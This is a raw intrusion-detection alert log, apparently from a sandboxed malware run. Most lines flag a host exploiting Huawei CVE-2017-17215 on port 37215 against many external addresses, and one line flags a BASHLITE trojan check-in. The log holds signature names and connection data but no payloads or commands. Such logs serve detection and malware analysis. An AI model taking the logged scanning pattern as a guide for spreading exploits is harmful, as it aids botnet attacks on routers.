                                            06/14/24-10:44:20.828446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4598037215192.168.2.14156.82.138.221
                                            06/14/24-10:44:31.079299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5228037215192.168.2.14197.40.66.120
                                            06/14/24-10:44:08.503569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4213837215192.168.2.14197.246.72.122
                                            06/14/24-10:44:33.133932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3878237215192.168.2.14156.147.251.186
                                            06/14/24-10:44:31.084546TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4219237215192.168.2.14197.150.82.160
                                            06/14/24-10:44:06.473472TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4506837215192.168.2.14156.177.246.225
                                            06/14/24-10:44:10.548978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4526237215192.168.2.1441.229.233.207
                                            06/14/24-10:43:34.678980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3691237215192.168.2.14156.87.220.158
                                            06/14/24-10:44:29.014623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4703237215192.168.2.14156.11.105.168
                                            06/14/24-10:44:06.471970TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4877837215192.168.2.14156.246.200.2
                                            06/14/24-10:43:41.912717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3689837215192.168.2.14197.199.240.129
                                            06/14/24-10:44:24.941844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5968237215192.168.2.1441.213.146.20
                                            06/14/24-10:43:48.019150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3561037215192.168.2.1441.187.75.0
                                            06/14/24-10:43:34.660742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3643237215192.168.2.1441.182.182.25
                                            06/14/24-10:43:41.849984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4076037215192.168.2.1441.130.196.14
                                            06/14/24-10:44:10.544518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4781037215192.168.2.14156.112.160.41
                                            06/14/24-10:44:35.181805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5513037215192.168.2.14156.190.97.198
                                            06/14/24-10:43:52.149280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4073637215192.168.2.14156.200.183.247
                                            06/14/24-10:43:56.226563TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4448237215192.168.2.14156.82.247.122
                                            06/14/24-10:44:08.502350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4617237215192.168.2.14156.198.60.179
                                            06/14/24-10:44:08.516921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4482037215192.168.2.14197.149.193.110
                                            06/14/24-10:44:14.667935TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5791237215192.168.2.1441.135.203.46
                                            06/14/24-10:44:06.453866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3681637215192.168.2.14197.9.125.230
                                            06/14/24-10:44:31.082214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3677037215192.168.2.14197.4.242.209
                                            06/14/24-10:43:45.968720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4176037215192.168.2.1441.51.80.248
                                            06/14/24-10:44:04.419728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5302237215192.168.2.14156.205.39.65
                                            06/14/24-10:43:36.702948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3304437215192.168.2.1441.218.186.212
                                            06/14/24-10:44:16.732547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5510637215192.168.2.14156.42.228.68
                                            06/14/24-10:43:36.726421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3308637215192.168.2.14197.6.203.30
                                            06/14/24-10:43:52.146794TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6025037215192.168.2.1441.190.55.4
                                            06/14/24-10:44:02.367824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5296437215192.168.2.1441.144.20.141
                                            06/14/24-10:43:37.763245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5283437215192.168.2.14156.116.1.90
                                            06/14/24-10:43:52.146231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6025437215192.168.2.14156.132.79.164
                                            06/14/24-10:44:12.644624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5080037215192.168.2.14156.158.216.29
                                            06/14/24-10:44:04.405883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5471837215192.168.2.14197.224.119.217
                                            06/14/24-10:44:26.997041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3669237215192.168.2.1441.176.68.32
                                            06/14/24-10:44:26.977159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4298437215192.168.2.14197.208.168.2
                                            06/14/24-10:44:31.051608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4655837215192.168.2.1441.137.142.180
                                            06/14/24-10:43:34.663014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4815837215192.168.2.14156.99.70.130
                                            06/14/24-10:43:58.294081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3421437215192.168.2.14156.160.70.77
                                            06/14/24-10:44:33.134976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4298437215192.168.2.14197.255.174.188
                                            06/14/24-10:44:31.087200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3350237215192.168.2.1441.221.84.219
                                            06/14/24-10:43:39.792405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5740637215192.168.2.14197.52.132.92
                                            06/14/24-10:43:58.291915TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5615837215192.168.2.14197.149.124.21
                                            06/14/24-10:44:18.761132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5263237215192.168.2.14197.245.74.148
                                            06/14/24-10:43:41.847400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4419237215192.168.2.1441.65.19.114
                                            06/14/24-10:44:06.452462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3445437215192.168.2.14197.69.53.85
                                            06/14/24-10:44:06.453337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4820437215192.168.2.1441.125.18.169
                                            06/14/24-10:43:48.034104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5653437215192.168.2.1441.67.246.227
                                            06/14/24-10:43:50.073491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5416437215192.168.2.1441.55.177.187
                                            06/14/24-10:44:31.082485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4886237215192.168.2.1441.164.64.205
                                            06/14/24-10:43:39.813025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4714837215192.168.2.14156.117.51.135
                                            06/14/24-10:43:43.944359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5306037215192.168.2.14156.127.10.35
                                            06/14/24-10:43:58.276474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4627637215192.168.2.14156.191.9.228
                                            06/14/24-10:43:37.772255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5079237215192.168.2.14197.33.21.171
                                            06/14/24-10:43:34.677859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5029437215192.168.2.14156.33.12.217
                                            06/14/24-10:44:08.519119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5624437215192.168.2.1441.155.238.169
                                            06/14/24-10:44:16.733378TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3963637215192.168.2.14197.45.99.61
                                            06/14/24-10:43:52.150224TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5137637215192.168.2.14197.184.181.188
                                            06/14/24-10:43:45.984870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5802037215192.168.2.1441.183.125.84
                                            06/14/24-10:43:58.293665TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3961037215192.168.2.14197.173.228.141
                                            06/14/24-10:43:37.761325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3931037215192.168.2.14156.241.179.8
                                            06/14/24-10:44:29.025132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5074237215192.168.2.14156.26.70.41
                                            06/14/24-10:44:03.525464TCP2840515ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586)6034223192.168.2.14101.23.0.0
                                            06/14/24-10:43:54.183260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5135037215192.168.2.14197.32.161.38
                                            06/14/24-10:44:31.052924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5372437215192.168.2.14197.45.178.208
                                            06/14/24-10:43:36.702648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3346437215192.168.2.14197.208.206.179
                                            06/14/24-10:44:24.913825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5850637215192.168.2.14197.43.238.133
                                            06/14/24-10:44:24.917773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3839637215192.168.2.14156.221.90.226
                                            06/14/24-10:44:26.999262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6090637215192.168.2.14197.140.162.237
                                            06/14/24-10:44:24.917307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4202437215192.168.2.1441.78.91.181
                                            06/14/24-10:43:37.763168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4073037215192.168.2.14197.197.15.156
                                            06/14/24-10:43:58.274333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4881637215192.168.2.14197.68.10.150
                                            06/14/24-10:43:58.294296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4442637215192.168.2.1441.95.55.56
                                            06/14/24-10:43:37.761629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5105437215192.168.2.14197.23.170.100
                                            06/14/24-10:43:43.943657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3744637215192.168.2.1441.211.182.182
                                            06/14/24-10:44:20.830042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5314037215192.168.2.14197.114.79.96
                                            06/14/24-10:43:45.967050TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3957237215192.168.2.1441.156.230.234
                                            06/14/24-10:44:31.082253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5163437215192.168.2.14197.186.243.120
                                            06/14/24-10:44:33.132643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3635037215192.168.2.1441.183.88.245
                                            06/14/24-10:44:08.519518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4591837215192.168.2.14197.50.204.148
                                            06/14/24-10:44:22.880280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5715437215192.168.2.14197.1.42.192
                                            06/14/24-10:44:02.368561TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5923037215192.168.2.14197.183.34.144
                                            06/14/24-10:44:22.859021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4013237215192.168.2.14197.168.131.225
                                            06/14/24-10:44:24.933539TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3492437215192.168.2.1441.72.243.242
                                            06/14/24-10:44:14.667673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5011437215192.168.2.1441.218.216.157
                                            06/14/24-10:44:29.022022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5330637215192.168.2.14197.135.57.191
                                            06/14/24-10:43:50.110839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5815437215192.168.2.14156.183.219.54
                                            06/14/24-10:44:33.132936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5128037215192.168.2.1441.4.79.22
                                            06/14/24-10:44:10.565968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5521637215192.168.2.1441.121.160.83
                                            06/14/24-10:43:43.972194TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5115237215192.168.2.14156.142.183.201
                                            06/14/24-10:44:10.567360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4209037215192.168.2.14156.1.197.71
                                            06/14/24-10:43:37.762682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5200837215192.168.2.14197.125.234.130
                                            06/14/24-10:44:35.180997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4781837215192.168.2.14156.255.101.66
                                            06/14/24-10:43:58.277551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6013037215192.168.2.1441.230.7.16
                                            06/14/24-10:44:29.023635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5979837215192.168.2.1441.42.115.207
                                            06/14/24-10:44:31.053550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4746237215192.168.2.14156.57.28.252
                                            06/14/24-10:43:39.808016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4148437215192.168.2.14197.23.101.72
                                            06/14/24-10:44:00.335970TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5043637215192.168.2.14156.185.41.223
                                            06/14/24-10:43:48.032855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4753637215192.168.2.14197.190.45.10
                                            06/14/24-10:43:36.723372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5719437215192.168.2.1441.211.157.43
                                            06/14/24-10:43:50.111273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6019037215192.168.2.1441.169.20.0
                                            06/14/24-10:44:29.024895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5043437215192.168.2.1441.108.100.119
                                            06/14/24-10:44:12.641411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6080437215192.168.2.14156.151.99.98
                                            06/14/24-10:43:52.165302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5524837215192.168.2.1441.162.62.52
                                            06/14/24-10:43:41.850238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5044437215192.168.2.1441.105.248.161
                                            06/14/24-10:44:29.013557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5149037215192.168.2.14156.180.127.241
                                            06/14/24-10:43:58.276436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4811837215192.168.2.14156.224.225.183
                                            06/14/24-10:43:50.072387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4932637215192.168.2.14156.33.42.173
                                            06/14/24-10:44:31.092225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5762837215192.168.2.1441.69.173.235
                                            06/14/24-10:43:43.944033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4855037215192.168.2.14197.76.191.250
                                            06/14/24-10:44:31.081815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3557037215192.168.2.14197.8.2.121
                                            06/14/24-10:43:39.789083TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4199837215192.168.2.1441.164.190.32
                                            06/14/24-10:44:06.470329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5063237215192.168.2.14156.34.22.184
                                            06/14/24-10:43:56.244581TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5238037215192.168.2.14156.174.183.90
                                            06/14/24-10:43:50.110996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5828637215192.168.2.1441.16.45.130
                                            06/14/24-10:44:29.012181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3419437215192.168.2.14197.203.156.33
                                            06/14/24-10:43:34.660691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5225437215192.168.2.1441.96.243.63
                                            06/14/24-10:43:43.971683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3727437215192.168.2.14197.154.142.122
                                            06/14/24-10:44:33.134818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3711437215192.168.2.14156.245.45.69
                                            06/14/24-10:44:04.411740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3826037215192.168.2.1441.93.44.94
                                            06/14/24-10:44:12.646535TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3831637215192.168.2.14197.51.137.146
                                            06/14/24-10:43:48.032595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4055837215192.168.2.14156.186.77.67
                                            06/14/24-10:43:50.072078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5573437215192.168.2.14197.54.46.90
                                            06/14/24-10:44:16.718205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5886037215192.168.2.14156.174.10.228
                                            06/14/24-10:44:33.133108TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4371037215192.168.2.1441.87.124.176
                                            06/14/24-10:44:00.342132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5740837215192.168.2.1441.19.76.211
                                            06/14/24-10:43:56.250908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5916637215192.168.2.1441.180.77.144
                                            06/14/24-10:43:39.791784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3765637215192.168.2.1441.191.128.5
                                            06/14/24-10:43:54.203095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5984437215192.168.2.14197.178.217.165
                                            06/14/24-10:43:37.762468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5037437215192.168.2.14197.12.96.139
                                            06/14/24-10:43:39.807864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5416837215192.168.2.1441.14.72.52
                                            06/14/24-10:44:18.763235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4906837215192.168.2.14197.127.212.3
                                            06/14/24-10:43:36.702693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4911037215192.168.2.14156.14.144.175
                                            06/14/24-10:44:12.643340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4032037215192.168.2.14197.247.104.126
                                            06/14/24-10:44:14.681251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3527437215192.168.2.14156.219.24.245
                                            06/14/24-10:43:45.989422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4494237215192.168.2.14156.168.17.185
                                            06/14/24-10:43:39.790553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4048437215192.168.2.14197.101.243.29
                                            06/14/24-10:44:22.862275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3650437215192.168.2.14197.143.228.14
                                            06/14/24-10:44:35.179975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4191837215192.168.2.1441.24.172.94
                                            06/14/24-10:43:36.702744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5408837215192.168.2.1441.34.13.214
                                            06/14/24-10:44:00.339630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5973637215192.168.2.14156.141.239.197
                                            06/14/24-10:43:34.675404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3484437215192.168.2.14197.237.52.108
                                            06/14/24-10:43:41.900189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5620837215192.168.2.1441.184.127.229
                                            06/14/24-10:44:31.087878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5725837215192.168.2.14197.125.90.16
                                            06/14/24-10:43:54.201809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5659437215192.168.2.1441.59.163.98
                                            06/14/24-10:43:58.275847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4297637215192.168.2.1441.226.114.9
                                            06/14/24-10:43:45.969179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3869837215192.168.2.14197.213.251.100
                                            06/14/24-10:44:10.566362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4648437215192.168.2.1441.220.217.142
                                            06/14/24-10:44:10.545708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5231237215192.168.2.1441.224.2.237
                                            06/14/24-10:44:22.858010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5631437215192.168.2.14197.186.66.138
                                            06/14/24-10:43:43.943252TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3894037215192.168.2.14197.47.1.149
                                            06/14/24-10:44:06.472149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3869237215192.168.2.14197.249.101.234
                                            06/14/24-10:44:14.685303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4020637215192.168.2.14197.173.255.92
                                            06/14/24-10:43:48.028748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5969237215192.168.2.1441.217.247.76
                                            06/14/24-10:43:52.146815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4373037215192.168.2.14197.249.179.120
                                            06/14/24-10:44:26.985962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5643237215192.168.2.1441.101.7.31
                                            06/14/24-10:43:34.663151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5327437215192.168.2.1441.32.235.166
                                            06/14/24-10:44:22.880343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4105037215192.168.2.14156.239.241.29
                                            06/14/24-10:44:24.932410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4148037215192.168.2.14197.211.215.27
                                            06/14/24-10:43:50.111082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4841237215192.168.2.14156.192.109.114
                                            06/14/24-10:43:37.762330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5266637215192.168.2.14197.53.27.139
                                            06/14/24-10:44:04.420988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4922637215192.168.2.14197.116.68.195
                                            06/14/24-10:44:04.419924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4930237215192.168.2.14197.207.32.74
                                            06/14/24-10:43:36.727874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5814637215192.168.2.14156.24.71.5
                                            06/14/24-10:43:52.146648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3674437215192.168.2.14197.112.35.99
                                            06/14/24-10:43:45.989569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4247237215192.168.2.14197.180.229.242
                                            06/14/24-10:43:36.725276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5203437215192.168.2.14197.70.225.57
                                            06/14/24-10:43:45.984970TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5728037215192.168.2.1441.155.107.211
                                            06/14/24-10:44:20.806339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5313237215192.168.2.14197.20.92.132
                                            06/14/24-10:44:12.624816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5302837215192.168.2.14197.97.209.161
                                            06/14/24-10:44:29.010924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4740237215192.168.2.14156.39.204.197
                                            06/14/24-10:43:34.660266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4215237215192.168.2.14156.47.96.254
                                            06/14/24-10:44:31.094623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4700837215192.168.2.1441.227.187.89
                                            06/14/24-10:44:18.766173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5324037215192.168.2.14156.128.167.82
                                            06/14/24-10:44:00.343084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4601837215192.168.2.1441.71.233.218
                                            06/14/24-10:43:54.201497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4716437215192.168.2.1441.5.232.105
                                            06/14/24-10:43:58.275058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3555237215192.168.2.1441.250.170.41
                                            06/14/24-10:43:43.943958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3613637215192.168.2.14156.12.47.2
                                            06/14/24-10:44:02.386267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5367837215192.168.2.14197.243.171.190
                                            06/14/24-10:43:41.904741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6022637215192.168.2.1441.126.105.200
                                            06/14/24-10:44:10.544785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3821637215192.168.2.1441.228.176.107
                                            06/14/24-10:44:20.830460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3556837215192.168.2.14156.133.153.142
                                            06/14/24-10:44:29.013693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3340637215192.168.2.14197.110.54.150
                                            06/14/24-10:43:34.661364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5911237215192.168.2.14197.12.163.24
                                            06/14/24-10:44:06.473598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4956637215192.168.2.14156.63.39.68
                                            06/14/24-10:43:56.227420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5774237215192.168.2.14156.54.142.44
                                            06/14/24-10:44:35.179487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4378637215192.168.2.14197.212.22.26
